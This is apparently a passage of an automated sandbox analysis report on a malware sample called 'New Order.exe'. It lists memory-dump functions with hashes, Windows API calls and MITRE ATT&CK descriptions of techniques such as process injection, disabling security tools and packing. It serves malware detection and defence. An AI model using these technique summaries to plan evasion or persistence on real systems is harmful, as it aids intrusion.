Opcode Fuzzy Hash: c7e319e3976d148378a0b29e22e7ba9ac45664db8c2f56e66d4df4691f7f26dc
Instruction Fuzzy Hash: 29513FB5D1520ACBCB00EFA8C8849EDFBBAFF8A310F699555D415B7201D770A946CF60

Uniqueness

Uniqueness Score: -1.00%

Function 07F42E28, Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.372565623.0000000007F40000.00000040.00000001.sdmp, Offset: 07F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 105f633f7aec7ad132f5f69cecc874bb0fd57f0b90ea0f54c2afb71ab3964d74
Instruction ID: fb4cb6883ce892dbe5a969cf479b35abd93f8d0955359a9ef916541a77cfd252
Opcode Fuzzy Hash: 105f633f7aec7ad132f5f69cecc874bb0fd57f0b90ea0f54c2afb71ab3964d74
Instruction Fuzzy Hash: 8931E3B2A15116CBC7148F59D9406BAFFA5FB81224F8CC036F8659B255C334C581C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 07F43F49, Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.372565623.0000000007F40000.00000040.00000001.sdmp, Offset: 07F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bff7a1716f36b3af1998afcc199c62be6ed7e27fdabfe64b636efd6142525757
Instruction ID: d5b35d33d450f09075ae53127506e755ce12e7c44ce6232f1c57be178d7bafc8
Opcode Fuzzy Hash: bff7a1716f36b3af1998afcc199c62be6ed7e27fdabfe64b636efd6142525757
Instruction Fuzzy Hash: 50316F79A051098FCB44DFA8E8559EDBBB1FF88305F1084AAE405AB264CB356E02CF61

Uniqueness

Uniqueness Score: -1.00%

Function 07F47B08, Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.372565623.0000000007F40000.00000040.00000001.sdmp, Offset: 07F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adacb6b5913ed5ebd692b0fa2ba070bcdca22ffcdf9b177a04521487f4b6c464
Instruction ID: f111f59d9120a97e34637126be88cb4a8fc7e0cc41707cbf813d9e8accb4e692
Opcode Fuzzy Hash: adacb6b5913ed5ebd692b0fa2ba070bcdca22ffcdf9b177a04521487f4b6c464
Instruction Fuzzy Hash: F421F9F1D1920ACFDB14EFA9C4446BEBBF4BB5A300F189055D805A3358D7388941CB65

Uniqueness

Uniqueness Score: -1.00%

Function 07F46E88, Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.372565623.0000000007F40000.00000040.00000001.sdmp, Offset: 07F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59218a47dd0ba593fe3659bd6c20e22603a354203bfdfd82d7c680462c2ddf48
Instruction ID: 40b84fc75b7d6b5aac6fac821f978640284d3a1c4101d8ee2b810d2ed4035ec5
Opcode Fuzzy Hash: 59218a47dd0ba593fe3659bd6c20e22603a354203bfdfd82d7c680462c2ddf48
Instruction Fuzzy Hash: 1921C57AD0920A9FCB00DFA4E9441DEFBB1FB45225B1082ABE019AB601D7345F45CFD2

Uniqueness

Uniqueness Score: -1.00%

Function 07F426D8, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.372565623.0000000007F40000.00000040.00000001.sdmp, Offset: 07F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e70f1628359fe69060695abd987988bb916895b2efc2401860eaae63c4fa658d
Instruction ID: a8ad8c12de790cfae8ab3aa2331702eba2ae5f8c158150e912579f29ddc5a722
Opcode Fuzzy Hash: e70f1628359fe69060695abd987988bb916895b2efc2401860eaae63c4fa658d
Instruction Fuzzy Hash: 062192B6A2411ADBDB008A6CC8013AFBFB5FB4A310F088636F525D7281E334DA408791

Uniqueness

Uniqueness Score: -1.00%

Function 07F46EBB, Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.372565623.0000000007F40000.00000040.00000001.sdmp, Offset: 07F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12e5c4868f0b0b26b5ed9df9b2c4b78f4cc07f945c968d24e1fd8a946a5d9acd
Instruction ID: 1e14d91eb0c5db560f3914f391fb49d1ae260577d5f75e3069ff494f0a7a4960
Opcode Fuzzy Hash: 12e5c4868f0b0b26b5ed9df9b2c4b78f4cc07f945c968d24e1fd8a946a5d9acd
Instruction Fuzzy Hash: 9E217F7990620A8FCB41DFA4E8415DDFFB1EB45315F0085ABE458DB251DB345F06CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 07F43F78, Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.372565623.0000000007F40000.00000040.00000001.sdmp, Offset: 07F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4449ae7c67c0c8b3349c1550b7cf27310de1a04eb57b561663d19b49ed7d5e7
Instruction ID: 942bd9d63031e28afcfcec207dc417b165fe26a22bbdba6a00dcbd37567432a7
Opcode Fuzzy Hash: d4449ae7c67c0c8b3349c1550b7cf27310de1a04eb57b561663d19b49ed7d5e7
Instruction Fuzzy Hash: 00211B74A0010A9FCB44DFA9D9959ADBBF2FF88304F108459E905AB364DB356E02CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 07F45609, Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.372565623.0000000007F40000.00000040.00000001.sdmp, Offset: 07F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7ba370b24a3603f1ea4d4fbb80057dd3e7a5131e1212891cbeb0a074fca9de9
Instruction ID: 3d59bb172f49d2825fc58cdf14bafbafc3a9aab4fe3f822b8e6a4ab2d7d2d5bf
Opcode Fuzzy Hash: f7ba370b24a3603f1ea4d4fbb80057dd3e7a5131e1212891cbeb0a074fca9de9
Instruction Fuzzy Hash: 5A219DB4D0521ADFCB00EFA8C5419AEBFB1FF49314F104699D455A7390D7309A42CF81

Uniqueness

Uniqueness Score: -1.00%

Function 07F45618, Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.372565623.0000000007F40000.00000040.00000001.sdmp, Offset: 07F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e5b5eb93814b6607331fc2ece95041df81645c5bf59775a2a3f264f1e4d6304
Instruction ID: c7a11e09d42a6eae6b8ea9f078ae0fa114771f91d76be110ffcb496cf63b1a74
Opcode Fuzzy Hash: 4e5b5eb93814b6607331fc2ece95041df81645c5bf59775a2a3f264f1e4d6304
Instruction Fuzzy Hash: 96118EB4D0521ADFCB40EFA8C5419AEBFB1FF49314F204659D455A7390D7309A81CF81

Uniqueness

Uniqueness Score: -1.00%

Function 07F46F00, Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.372565623.0000000007F40000.00000040.00000001.sdmp, Offset: 07F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 573d8e2871fd25f293d3d5c0c56d646505f6a5b3e41f1182db4a2803336cfc4e
Instruction ID: 2400c38f1e2aa3999d4b1a39d943b706690840bb007db2c883f2874e907edac9
Opcode Fuzzy Hash: 573d8e2871fd25f293d3d5c0c56d646505f6a5b3e41f1182db4a2803336cfc4e
Instruction Fuzzy Hash: 8F01D774D1520E9FCB44DFA8D9856AEFBB1FF48304F1085AAE519A7350EB305A41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 07F456C9, Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.372565623.0000000007F40000.00000040.00000001.sdmp, Offset: 07F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cbeab773ccf28d68f7cef1ba0c0ac2384e9a81d8bc996ee48ac02bad3d56433
Instruction ID: 31450a7be1a833a94b718185963705328ecd45ffa1dbd45c2140272d44066e57
Opcode Fuzzy Hash: 1cbeab773ccf28d68f7cef1ba0c0ac2384e9a81d8bc996ee48ac02bad3d56433
Instruction Fuzzy Hash: 9901E4B4E052099FCB44EFA8D5406AEBBF1FB44204F1086AAD818A7310E7349A42CB81

Uniqueness

Uniqueness Score: -1.00%

Function 07F456D8, Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.372565623.0000000007F40000.00000040.00000001.sdmp, Offset: 07F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b445da5766aa784146066af5ef435b64f96b7bf8e85ca7659f5640d96a640f05
Instruction ID: 8a317bf4c5c871dde82cf2b6c12f98a158b11d2c164052c94b0c42d10beba2c2
Opcode Fuzzy Hash: b445da5766aa784146066af5ef435b64f96b7bf8e85ca7659f5640d96a640f05
Instruction Fuzzy Hash: 45F07474D0520DAFDB44EFA8D54169EFBF1FB48204F1086AA9518A7314E7709A46CB81

Uniqueness

Uniqueness Score: -1.00%

Function 07F43AA0, Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.372565623.0000000007F40000.00000040.00000001.sdmp, Offset: 07F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79e2a8b129e5652112e1eb5ffa79f9e2585899c646d20da92c329cb55fc494e0
Instruction ID: 79e4362493391de18e7abcee9faea2e36c992691baf44cb4f9c074459f075306
Opcode Fuzzy Hash: 79e2a8b129e5652112e1eb5ffa79f9e2585899c646d20da92c329cb55fc494e0
Instruction Fuzzy Hash: 16E0ED70918216CFDB50CF64EC4479C7BB1EB45350F108A95A41EB72D0DB301E81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 07F43D88, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.372565623.0000000007F40000.00000040.00000001.sdmp, Offset: 07F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d58d8d9030b6404dee46623a428d3400fa029dc20de305c801d230748af7d7cf
Instruction ID: ebeb3d6368ac69a7eb207db7475f07f2a0159e4c9ddc1c5a53838df6dceb856a
Opcode Fuzzy Hash: d58d8d9030b6404dee46623a428d3400fa029dc20de305c801d230748af7d7cf
Instruction Fuzzy Hash: 39D09EB581821ACFCB10CFA4D8494DCBFB4FF0A714B185159E45567352CB304447CB41

Uniqueness

Uniqueness Score: -1.00%

Function 07F42B38, Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.372565623.0000000007F40000.00000040.00000001.sdmp, Offset: 07F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5f2539dba60d6cc616e79d73fc9d31716de147afa90564ea743546f3d47e25c
Instruction ID: 95b1f61750e986b1acd927b6de848754d3a7bed7d7b91ef0dd4390aeb0a4e160
Opcode Fuzzy Hash: f5f2539dba60d6cc616e79d73fc9d31716de147afa90564ea743546f3d47e25c
Instruction Fuzzy Hash: EEB092B0C0131D6A4B10BEEF8D89C9BFEBCFA46690B80013DA50862201D6B06604C5F2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 07F407F8, Relevance: .3, Instructions: 267COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.372565623.0000000007F40000.00000040.00000001.sdmp, Offset: 07F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9195c59b49925052990fc465750b71f84b2274702b240d9628c2755b332828ec
Instruction ID: fbc08a2e2a6645008d1085ac8751d9cd9bea1c7ef4ac98510ac24cd3f84a6a48
Opcode Fuzzy Hash: 9195c59b49925052990fc465750b71f84b2274702b240d9628c2755b332828ec
Instruction Fuzzy Hash: 3FD1FA31D2075A8ACB10EF68D994ADDB7B1FF95300F51CB9AE1097B220EB706AC5CB51

Uniqueness

Uniqueness Score: -1.00%

Function 07F40808, Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.372565623.0000000007F40000.00000040.00000001.sdmp, Offset: 07F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c56bd54cdca209ad33d8faee8e40d687d92b3975388fe16effb8e32f7eaa8d8f
Instruction ID: 3d99f207ee5926e74019383f158290d489f1d237617772bd9c82dc063ab54c63
Opcode Fuzzy Hash: c56bd54cdca209ad33d8faee8e40d687d92b3975388fe16effb8e32f7eaa8d8f
Instruction Fuzzy Hash: 67D10A31D2075A8ACB10EF68D954ADDB7B1FF95300F51CB9AE1093B220EB706AC5CB51

Uniqueness

Uniqueness Score: -1.00%

Function 07F44068, Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.372565623.0000000007F40000.00000040.00000001.sdmp, Offset: 07F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c307e358510af6f0fa2ee4d62d48bb455d01833e8c995494fe8d5a4aef45d2a7
Instruction ID: a947b336222b225c3216f2e42891796956469afcc8d67de6b1d8cb3806c5797a
Opcode Fuzzy Hash: c307e358510af6f0fa2ee4d62d48bb455d01833e8c995494fe8d5a4aef45d2a7
Instruction Fuzzy Hash: CE315EB5E0411A8BDB48CBAAD9416FEBBF7EB88310F24D529D419F7344CB74D9418B90

Uniqueness

Uniqueness Score: -1.00%

Function 07F4605F, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.372565623.0000000007F40000.00000040.00000001.sdmp, Offset: 07F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c19284b480308c3ce636cd2664ac39b0f3948243f8d5b5a1e76a6c8b0fa909bc
Instruction ID: 2cacea547faeffdb6e6a270c200e9b437108d918e24061333d8edd5e20b12d6b
Opcode Fuzzy Hash: c19284b480308c3ce636cd2664ac39b0f3948243f8d5b5a1e76a6c8b0fa909bc
Instruction Fuzzy Hash: 7731C7B5E056089FDB08CFAAE88459DFFF2AF89300F08C06AE515EB265DA349945CB51

Uniqueness

Uniqueness Score: -1.00%

Function 07F46070, Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.372565623.0000000007F40000.00000040.00000001.sdmp, Offset: 07F40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 942e1d049b3dee871bb8ab749acb935fa7110bd20bc26397ef32d60ce3bdb202
Instruction ID: 10b9bdb6b5551010c3eaf3fe35c625a683bbe234ca555d010646a405c8478ad8
Opcode Fuzzy Hash: 942e1d049b3dee871bb8ab749acb935fa7110bd20bc26397ef32d60ce3bdb202
Instruction Fuzzy Hash: 2B11B9B1D146089BDB0CCFABD8442AEFAF7AFCA300F08D439D914B6214EB3445028F55

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: New Order.exe PID: 4652 Parent PID: 5976 New Order.exeCOMMON

Executed Functions

Function 015B6939, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 123threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 015B69A0
GetCurrentThread.KERNEL32 ref: 015B69DD
GetCurrentProcess.KERNEL32 ref: 015B6A1A
GetCurrentThreadId.KERNEL32 ref: 015B6A73

Strings

YuQp, xrefs: 015B695C

Memory Dump Source

Source File: 00000003.00000002.689763053.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID: YuQp
API String ID: 2063062207-920529062
Opcode ID: 3c96942d2913be03e11e392eb0af4d193e6cb95c621ad132e855a137151e6185
Instruction ID: 74705beae580bed359814fe70eaae784e88e821e86f620b85275e667deb7a982
Opcode Fuzzy Hash: 3c96942d2913be03e11e392eb0af4d193e6cb95c621ad132e855a137151e6185
Instruction Fuzzy Hash: BF5134B0A002498FEB54CFAAD688BEEBBF1BF88314F208559E549B7350DB745944CF61

Uniqueness

Uniqueness Score: -1.00%

Function 015B6940, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 015B69A0
GetCurrentThread.KERNEL32 ref: 015B69DD
GetCurrentProcess.KERNEL32 ref: 015B6A1A
GetCurrentThreadId.KERNEL32 ref: 015B6A73

Strings

YuQp, xrefs: 015B695C

Memory Dump Source

Source File: 00000003.00000002.689763053.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID: YuQp
API String ID: 2063062207-920529062
Opcode ID: 582e73c0add4862cbf6aa862c2d59ae95b18cb15e1e06f8ffdea4a174f7cf0c4
Instruction ID: 4b7157ba51da1c325981fbde6aef9ccb59ddb7aab326c1926483e08cef29087a
Opcode Fuzzy Hash: 582e73c0add4862cbf6aa862c2d59ae95b18cb15e1e06f8ffdea4a174f7cf0c4
Instruction Fuzzy Hash: 8C5146B0A002498FDB14CFAAD688BEEBBF1BF88314F208459E109B7350CB745944CB61

Uniqueness

Uniqueness Score: -1.00%

Function 015B5084, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 118COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 015B51A2

Strings

YuQp, xrefs: 015B50BE
YuQp, xrefs: 015B50DE

Memory Dump Source

Source File: 00000003.00000002.689763053.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: false

Similarity

API ID: CreateWindow
String ID: YuQp$YuQp
API String ID: 716092398-1897131467
Opcode ID: c71464505f539ae1eaf323adf6a581cf8af85a17d7108ab136289c39aa7e18d9
Instruction ID: d00e29ed170b467d085ed3fea20d4077cc753d11d9fd17f9a41298bb76394a69
Opcode Fuzzy Hash: c71464505f539ae1eaf323adf6a581cf8af85a17d7108ab136289c39aa7e18d9
Instruction Fuzzy Hash: B051B1B1D103499FDF15CFAAC884ADDBFB5BF48314F25812AE819AB210D7749985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 015B5090, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 015B51A2

Strings

YuQp, xrefs: 015B50BE
YuQp, xrefs: 015B50DE

Memory Dump Source

Source File: 00000003.00000002.689763053.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: false

Similarity

API ID: CreateWindow
String ID: YuQp$YuQp
API String ID: 716092398-1897131467
Opcode ID: cd9e0e0e3ee7eb95fa4f475886d32ef8837fb228fa6b1d5405e0b4da0d9654c6
Instruction ID: 73756915538f52db651390e803078f9bf4cd1dc7e555d12951360fc646f6e391
Opcode Fuzzy Hash: cd9e0e0e3ee7eb95fa4f475886d32ef8837fb228fa6b1d5405e0b4da0d9654c6
Instruction Fuzzy Hash: EC41B0B1D103499FDF14CF9AC884ADEBFB5BF48314F24812AE819AB210D7749985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 015B779C, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 015B7F01

Strings

YuQp, xrefs: 015B7E57

Memory Dump Source

Source File: 00000003.00000002.689763053.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: false

Similarity

API ID: CallProcWindow
String ID: YuQp
API String ID: 2714655100-920529062
Opcode ID: dabb4cfdd3d95fbd9524496c3ea70934b07fdeabc8ca7baa6f4a557163d4e50d
Instruction ID: 14a4283279dc462add4812477abcb41edbd4c8ff31ecf0466796f7f525c14607
Opcode Fuzzy Hash: dabb4cfdd3d95fbd9524496c3ea70934b07fdeabc8ca7baa6f4a557163d4e50d
Instruction Fuzzy Hash: 69411AB5A00205DFDB14CF99C488AAABBF5FF88314F148859E519AB361D774A941CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 015BC189, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 015BC212

Strings

YuQp, xrefs: 015BC1AF

Memory Dump Source

Source File: 00000003.00000002.689763053.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: false

Similarity

API ID: EncodePointer
String ID: YuQp
API String ID: 2118026453-920529062
Opcode ID: c953491f14587aff7c489fb39f764484497386963ede395bb188668a6a53f178
Instruction ID: cdb88ebd698e343195d33d6b722f73114f571cfddd0a47b54a4d11f116b21e10
Opcode Fuzzy Hash: c953491f14587aff7c489fb39f764484497386963ede395bb188668a6a53f178
Instruction Fuzzy Hash: F631BE758053898FDB10CFA9E9883DEBFF4FB45318F1484AAD488AB252C7B95544CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 015B6B61, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 015B6BEF

Strings

YuQp, xrefs: 015B6B87

Memory Dump Source

Source File: 00000003.00000002.689763053.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID: YuQp
API String ID: 3793708945-920529062
Opcode ID: c4377f21ac4d61723414abee5decf697c6a8b848ff4f653b890669b84b36d8fa
Instruction ID: 1dd1813a5a105cda3d63112aebaadc5d5f8a2420529e963a99113f20af72e972
Opcode Fuzzy Hash: c4377f21ac4d61723414abee5decf697c6a8b848ff4f653b890669b84b36d8fa
Instruction Fuzzy Hash: 332112B5D002499FDB10CFAAD984AEEBFF4FB48324F14842AE954A7310D378A944CF60

Uniqueness

Uniqueness Score: -1.00%

Function 015B6B68, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 015B6BEF

Strings

YuQp, xrefs: 015B6B87

Memory Dump Source

Source File: 00000003.00000002.689763053.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID: YuQp
API String ID: 3793708945-920529062
Opcode ID: c7a6026931ef13580085d191fc86e25d56e2df743669ef9312c860d8d148d146
Instruction ID: 3e460c2a159332284d0b173170207e0198b7121ee366274ecc3212b1f0b26c26
Opcode Fuzzy Hash: c7a6026931ef13580085d191fc86e25d56e2df743669ef9312c860d8d148d146
Instruction Fuzzy Hash: FB21D3B5D002499FDB10CFAAD984ADEBFF8FB48324F15841AE915A7310D778A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 015BC198, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 015BC212

Strings

YuQp, xrefs: 015BC1AF

Memory Dump Source

Source File: 00000003.00000002.689763053.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: false

Similarity

API ID: EncodePointer
String ID: YuQp
API String ID: 2118026453-920529062
Opcode ID: 6951691af880e5e4657fd2213f0913dfef0cfc1027510af13bb2b9dd162cc5bd
Instruction ID: f2ff1787913bf11f5249c409799d146f15e3573f1c076ec81ce6762778a25e76
Opcode Fuzzy Hash: 6951691af880e5e4657fd2213f0913dfef0cfc1027510af13bb2b9dd162cc5bd
Instruction Fuzzy Hash: A5116A719013098FDB10DFAAD9487DEBBF4FB49354F20846AD449AB701C7B86544CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 015B3300, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 015B4116

Strings

YuQp, xrefs: 015B40CF

Memory Dump Source

Source File: 00000003.00000002.689763053.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: false

Similarity

API ID: HandleModule
String ID: YuQp
API String ID: 4139908857-920529062
Opcode ID: 41de280feac42989d049d8f564a2c204e73d6b6f9d19e90212b649eb5f755555
Instruction ID: c50949265813976b9ffb857482e9526f16716997dd9ce636e0bb58d480827c37
Opcode Fuzzy Hash: 41de280feac42989d049d8f564a2c204e73d6b6f9d19e90212b649eb5f755555
Instruction Fuzzy Hash: C51104B1D006498FDB20CF9AD484BDEFBF4FB49224F15842AD529BB201D374A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 012BD53C, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.688507685.00000000012BD000.00000040.00000001.sdmp, Offset: 012BD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 268d2e634dea67edf860d2151bd952e307a5f1f55a25818ac171de56df575ce6
Instruction ID: 131d388ee5930ab16fee9b1c1769089d66d6ba63260c345f3027adceda0bb9c8
Opcode Fuzzy Hash: 268d2e634dea67edf860d2151bd952e307a5f1f55a25818ac171de56df575ce6
Instruction Fuzzy Hash: 3A2148B1514248DFCB05DF94E8C0BD6BF65FB8836CF248569E9054B246C336D856C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 012BD537, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.688507685.00000000012BD000.00000040.00000001.sdmp, Offset: 012BD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d8a9d817077d39d9fad6da2ff2e5526acd16db30dd6086573c8171f784580f2
Instruction ID: e2f5964e9b794eb8021630a7d0991c91820f30ad2c5dade928651d140fc1f4bd
Opcode Fuzzy Hash: 0d8a9d817077d39d9fad6da2ff2e5526acd16db30dd6086573c8171f784580f2
Instruction Fuzzy Hash: 2E110372404284CFCB02CF54D5C4B96BF72FB84328F24C6A9D9094B616C336D45ACBA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

